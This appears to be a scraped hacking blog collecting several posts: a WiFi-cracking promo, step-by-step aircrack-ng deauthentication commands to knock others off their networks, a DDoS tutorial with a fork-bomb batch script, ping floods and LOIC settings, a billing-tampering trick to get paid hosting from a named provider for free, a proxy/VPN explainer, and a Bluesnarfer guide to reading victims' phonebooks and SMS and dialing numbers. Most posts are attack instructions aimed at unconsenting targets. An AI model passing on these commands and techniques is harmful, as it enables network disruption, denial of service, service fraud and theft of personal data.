Please Click and Help Us get a domain...

Sunday, October 8, 2017

WiFi Password Hacker

WiFi Password Hacker

WiFi Password Hacker For PC | Download Wifi Hacker: The world we live now is a complete package of technology and its successor, the Internet. Emerge of the internet have brought the whole world under one’s eye. The internet is everything now, and one needs to pay for it, however. Good things never come for free at times. But the internet can be made available for free sometimes. One way of using the free internet is using the unencrypted WiFi network available in the nearby location such as in cafe, railway station and other public places.

The other method is by using the secured and encrypted WiFi internet access. The name encryption refers the protection given to the WiFi network regarding username and a password. No issues when both the username and password is known. What if you don’t have both the things? No worries. Just hack the WiFi network with password hacking software. Download WiFi Password Hacker Now.

WiFi Password Hacker

Of course, this article would deal ultimately about the hacking. One could completely enjoy the internet without paying a single buck with WiFi password hacking software for PCs. It is certain you have the internet connection in the form of encrypted WiFi and not able to utilize the Internet over that network. The problem felt in using the encrypted WiFi network is the password. Only the authenticated user knows the password of that particular system such that providing security from unauthorized user access to that network. Technology always provides a solution for any problem and for here with hacking.

Tuesday, December 8, 2015

Disconnect Anyone From His Own Wifi Without password.

Disconnect Anyone From His Own Wifi Without password.



Hello , hacker welcome to techproupdate today i have something good to tell you,you may heard many times that someone disconnect client from wifi without knowing his or her wifi password so if you wonder how does they do it,read this article...

Requirement for this trick.
Linux - Download
Aircrack-ng - Download

Steps to Disconnect Anyone From His Own Wifi Without Password

Step:1 - launch aircrack-ng type “airmon-ng” in terminal).

Step:2 - turn on monitor mode in your wireless card by typing “airmon-ng start wlan0) wlan0 should be your wireless interface (check your interface by typing “iwconfig in another terminal ).

Step:3 - as now your wireless card is in monitor mode it can be use to search wireless AP around you, so to see AP around you type “airodump-ng mon0” mon0 is your interface .

Step:3 - now choose wifi of which you want to disconnect client and copy its BSSID.And to focus on your particular target type airodump-ng -c (channel of your target AP) –bssid (BSSID of your Target AP) mon0.

Step:4 - take down his client by typing “aireplay-ng –deauth 10 -a (BSSID of your target AP) -c (MAC address of the client to be deauthenticated) mon0”

–deauth : number of deauthorization packet to be send, like we take 10 in this example above.

After this command “aireplay-ng –deauth 10 -a (BSSID of your target AP) -c (MAC address of the client to be deauthenticated) mon0” this particular client will disconnect from your target wifi .

Or if you want to take down all the connected client from your target wifi

then type : aireplay-ng –deauth 1000 -a (BSSID of your taget) -h (your mac address ) mon0. this command disconnect all the connected clients from target wifi.

To find your mac address open terminal and type “ipconfig”

This attack was known as :
Deauthentication Attack
Usage Tips
It is usually more effective to target a specific station using the -c parameter.

The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them....

please can you help us get a domain.. (Click our Ads in here.. please do this for get a domain...)

Sunday, December 6, 2015

DDoS Attack - A life lesson

DDoS Attack - A life lesson



Introduction
Recent events that have gone on in my favorite website(darksunlight.com) have inspired me to inform people of the dangers of DDoS.

Like the art of hacking by "Social Engineering", their is no anti-virus for DDoS. The only cure is knowledge. Informing the people is the only way to keep it from happening to them. Or a nice firewall

I know their are a lot more ways to DoS than are shown here, but i'll let you figure them out yourself. If you find any mistake in this tutorial please tell me...

What is "DDoS"?
Denial of Service attacks(or Distributed Denial of Service attacks[DDoS]) are a form of organized attacks with the goal of taking down a server by overloading it. Often by sending useless information(packets) to a server in massive amounts.

In-fact about a year ago I found one of my websites was accidentally DoS-ing darksunlight.com(I use darksunlight as my webhost) because my PHP script made an infinite loop that sent the same information over and over and over into darksunlight's SQL databases. This one page took this EXTREMELY powerful server down twice in less than a minute. That site has since been deleted.
That story demonstrates that it does not take more than a simple "error" in your code to overload a server.

Keep in mind that altough spreading knowledge is my main goal, performing DDoS attacks is indeed a federal crime in the US.
It is also an international offence and will be punished according to the local laws of the individual's country.

But enough talk. I will now show you a quick example of a DoS attack of sorts you can do on your local computer.

Sample
Keep in mind that this is NOT a real DoS attack, but rather an example to visualize how a DoS attack works.

We will take down YOUR computer.

Step 1 - Open up notepad, mousepad, or your favored equivalent.
Step 2 - Type in this simple batch command

:a
start
goto a

Step 3 - Save as "dossample.bat" making sure you select "All files" from the "File Type" dialog.

Step 4 - Run that sucker, but save your work first, as this will crash even the best computers in a matter of minutes.

What did you learn from this?
Observe how the file rapidly replicates itself, opening a new CMD right after it opens another.
An infinite loop has been created that has filled the RAM with useless and massive amounts of CMDs(or Terminals for you Unix folk)

DDoS attacks work much the same way, except instead of replicating an infinite number of CMDs, they send information(packets) to the server over and over and over again until the server crashes.

What information you may ask?
Anything. Your login name, your 'online' status, a new comment, the number of views on a video, your new high score. Absolutely any information that could be resent a massive amount of times to the same server.

Next we will be discussing the simplest form of DDoS.

DDoS by Ping Flood

Please note that I will be pinging my Localhost. You should too.

Perhaps one of the simplest ways to DoS is by using the 'ping' command built into most operating systems, including all windows and Linux distributions.

Step 1 - Start up your server. Mine is apache, but that is beside the point, the server type does not matter. If it has an IP address, it can be pinged.
Step 2 - Type in the ping command

ping -t -a -l 65500 localhost

Step 3 - Press enter and watch it ping the localhost over and over until[/b]

your server crashes, or you get tired of waiting for it to crash.

Since most modern servers can take the stress of the ping flood, you will need to get all your friends to help you ping to bring your server down. Or even slow it down.

Command Explained
ping - tells the computer to ping a server
-t - It will continue to ping the server until the command is closed, or stopped.
-a - Resolves the adress to host names.
-l - Size.

By default the ping will send 32bytes of data to the server, so you must change this to a bigger number. The maximum is 65,500bytes, so that is what we used.

If you send a server any number higher than 65,500bytes it will instantly crash. This is called "Ping of Death".
Like any other thing with the suffix "of Death" it is very rare, and hard to accomplish indeed.

DDoS by Reloading
Something as simple as reloading a page can take down a server if done enough times.

Step 1 - Make a page that lets you submit forms. Method='GET' is better than method='POST' for this, but both will work.
(If you do not understand step 1, just find a page that lets you submit information, like a new comment or upload a picture)
Step 2 - Fill out the forms and submit
Step 3 - Reload the page
If the page uses the POST method your browser will display a dialog asking if you are sure you want to resend the information, or something to that effect. Simply click "Continue" or "OK".(see now why GET is better?)
Step 4 - Keep reloading until server is down.

Their are many add ons and tools that allow you to auto-reload a page. It is a matter of googleing for them. They are widely available and free.

I have just created a program that allows you to Auto-refresh a page using IE. If you are interested please download from:
Host: Darksunlight.com
 Size: 9kb
Format: .zip ultra compressed
Platform: Windows

This method is very primitive as you can see, but it is probably the best way to DDoS.

Low-Orbit Ion Cannon
LOIC (Low Orbit Ion Cannon) is an app, written in C# and developed by praetox, that was used by Anonymous during Project Chanology. It attempts to DoS the target site by using all its bandwidth, sending TCP, UDP, or HTTP requests to the server until it crashes.

Download : LOIC
Host: SourceForge
Size: 130kb

Step 1 - Download and extract LOIC
Step 2 - Open LOIC.exe and fill out the required information.


Instructions for filling out:
IP or URL = IP or URL that you wish to DoS
TCP / UDP message = information being sent, just write something random. Or leave it as default.
Port = Server's port
Method = Server's Method, leave as TCP if unknown
If you are gonna try to take down a website then use HTTP
Speed = set to "<= faster"
Threads = How many users it should simulate, the higher the number the faster it will crash. Set to 10,000. Note that this might make your computer lag, if so, set to a lower amount.

Step 3
Click on "IMMA CHARGIN MAH LAZER"
This starts your the program.

Warning: This tool might not seem like much, but many people of all ages have been arrested and convicted for knowingly using this tool. Remember DoS and DDoS are federal crimes, however insignificant it may seem. Use at your own discretion.

Conclusion
Now you know what a DDoS attack is and you can work to better protect your self.

Their are still many other ways to attack a server, but these are the basics of DoS.
Protect your servers xD

Like any web developer I hope you will use this information for the good.
Sadly i know that their are those among us that are, even now as we read this, plotting how to do harm with this information.
To those, I flip the bird.

You may use this tutorial, in part or as a whole, for whatever purpose.

Monday, November 30, 2015

Webhosting site exploit.!

Webhosting site exploit.!

HELLO, I found an exploit for a website to get their paid hosting service for 0$! it isn't that great but its cool.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Tools Needed:InternetFirefox Web BrowserTamper Data (it's an addon for firefox)

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Steps:
Step #1 Open up Firefox, you need to install the Tamper Data addon, search Tamper Data on google and install it then restart firefox it says to do so.

Step #2 Go to the website were going to this exploit on which is cpanel.hostinger.co.uk. Hey I tried this on a few other webhosts and it didn't work so not all webhosts will work using this exploit.

Step #3 Once logged in the cpanel hover over on Hosting in the red TAB Click + New Account.

Step #4 Now choose on the paid choices Premium, Business.

Step #5 Okay were kinda almost done Its now time to open the tool Tamper Data in firefox on the top left hand corner It says tools and find and click Tamper Data HEHEHE IT should open up a program on firefox don't touch it yet.

Step #6 Now were here... click on any billing cycle choose any :)

now its time to click start tamper on the program then click continue on the website it pops up click Tamper.

Step #7 Find period erase everything in the field then click okay. Keep clicking submit until you get to the next page then click stop Tamper in the program we don't need it anymore.

Step #8 FINAL STEP It will say invoice not found then reload the page click the red TAB on top again it will have your paid webhosting that we got for free.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

So that's how you do it! I hope this helps. Please comment and Keep in touch...

Saturday, October 17, 2015

PROXIES AND VPNS | WHAT IS THE DIFFERENCE

PROXIES AND VPNS | WHAT IS THE DIFFERENCE

Hide My Ass is a popular VPN and Proxy provider and supplies both free & premium proxies.

Proxies and VPN’s, what really is the difference? Because proxies and VPN’s ostensibly do the same job, people often considered them to be the same or at least similar.

Additionally people who have grasped the concept of proxies and VPN’s, usually conclude, “VPN’s are better than proxies but cost much more” which are absolutely correct but do not understand exactly why. Therefore, in this post I will be explaining exactly that, why VPN’s are better than proxies and what really is the difference.

Proxies
There are two type main types of proxy servers, HTTP and SOCKS though they work in a similar why there are some difference that dramatically changes there properties.

HTTP Proxies | A proxy running under the HTTP protocol interprets traffic at the HTTP level. Meaning HTTP proxies cannot be used for anything but websites. However, because of this high-level interpretation the proxy server does not have to do as much work meaning, a faster connection and more users. In addition, because of each user of the proxy server consumes very little of servers resources, many people can connect to one server at once. Furthermore, many public HTTP proxy servers are accessible at no cost.

SOCKS Proxies | Subsequently, a proxy using the SOCKS protocol interprets the connection at a much lower level, forwarding actual packets and more closely resembles a VPN. However, because the server has to interpret the individual packets, the servers’ resources are stressed much more. Nevertheless, can be used to mask any type connection whereas HTTP proxies are only good for web surfing. That being said, SOCKS proxies are not always better than HTTP being there is much slower and harder to find for free.

In general, all proxies have some similar properties. Firstly they little to no encryption maxing out at 128-bit, which means if someone really wanted to look at you traffic they could. Secondly, they have to be configured individually with software and do not mask the whole system. Lastly, almost every circumstance clever use of Flash or JavaScript can allow sites to detect your true IP and ISP peer scanners can detect and specify torrent activity.

VPN’s

VPN’s succeed where proxies fail in almost every way except for, cost. Because VPN’s support up to 2048-bit encryption they can insure maximum security, well in theory it is still possible to decrypt extremely high encryption, in practice just does not happen. These high encryptions insure that you traffic is kept absolute secret. However, some VPN hosts Keep logs making the whole point or the VPN redundant. Additionally VPNs usually have much faster speed, of course depending on the VPN supplier.
Conclusion of PROXIES and VPN

VPNs are preferred for in almost any circumstance. It provides greatly improved internet anonymity, and masks the entire system protecting you no matter what you do. In addition to this, because ISPs cannot monitor your internet activity at all under a VPN, it is an effective means of bypassing ISP throttling. But because proxies are available for free and in some circumstance that is all that is required such as, unblock text content block in your country, a proxy chosen over a VPN

Wednesday, October 14, 2015

How To Hack Phones With Bluetooth Using Backtrack (BT5/Kali Linux)

A brief tutorial on how to hack a phone via bluetooth using Bluesnarfer.

[Image: Ola4nby.png]

For Backtrack/Kali Linux :

First we must install Bluesnarfer 

Make your way to the opt directory


Code:
cd /opt

Get Bluesnarfer using the wget command
Code:
/opt# wget http://alighieri.org/tools/bluesnarfer.tar.gz

Reopen the directory using the ls command and you will see Bluesnarfer in there, now we have to extract it.
Code:
:/opt# ls
bluesnarfer.tar.gz  firmware-mod-kit  metasploit  Teeth

To extract we use the simple tar xvf command
Code:
/opt# tar xvf bluesnarfer.tar.gz

Reopen the directory once again and you will see Bluesnarfer there
Code:
/opt# ls
BFi13-dev-18  bluesnarfer.tar.gz  metasploit
bluesnarfer   firmware-mod-kit    Teeth

Lets enter that folder like so
Code:
/opt# cd bluesnarfer

Code:
/opt/bluesnarfer# ls
include  Makefile  README  src

Now we finish it off by compoling the install like this
Code:
/opt/bluesnarfer# make

To see all of the Bluesnarfer commands run this command ./bluesnarfer
Code:
:/opt/bluesnarfer# ./bluesnarfer

Now that we have Bluesnarfer, you must configure rfcomm first, if you havent already done that,
Code:
mkdir -p /dev/bluetooth/rfcomm

Code:
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0

Code:
mknod --mode=666 /dev/rfcomm0 c 216 0

Code:
hciconfig -i hci0 up

Code:
hciconfig hci0

(Scan for victims)
Code:
hcitool scan hci0

(ping the vitcim to see if he is awake)
Code:
l2ping  < victim mac addr>

(browse the victim for rfcomm channels to connect to)
Code:
sdptool browse --tree --l2cap < mac addr >

(then you can use bluesnarfer for example to read the victims phonebook, dial a number or read Sms or other things.)
Code:
Bluesnarfer -r 1-100 -C 7 -b < mac addr >

(to see available opions to do )
Code:
bluebugger -h

(Dial number )
Code:
bluebugger -m < victim name > -c 7 -a < mac addr > Dial < number >

Extra: This is what the Bluesnarfer shell should look like
Code:
bluesnarfer, version 0.1 -
usage: bluesnarfer [options] [ATCMD] -b bt_addr

ATCMD     : valid AT+CMD (GSM EXTENSION)

TYPE      : valid phonebook type ..
example   : "DC" (dialed call list)
      "SM" (SIM phonebook)
      "RC" (recevied call list)
      "XX" much more

-b bdaddr : bluetooth device address
-C chan   : bluetooth rfcomm channel

-c ATCMD  : custom action
-r N-M    : read phonebook entry N to M
-w N-M    : delete phonebook entry N to M
-f name   : search "name" in phonebook address
-s TYPE   : select phonebook memory storage
-l      : list aviable phonebook memory storage
-i      : device info

Tuesday, October 13, 2015

LOIC - Low Orbit Ion Cannon.

Low Orbit Ion Cannon.

The project just keeps and maintenances (bug fixing) the code written by the original author - Praetox, but is not associated or related with it.

DISCLAIMER: USE ON YOUR OWN RISK. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER OR CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES.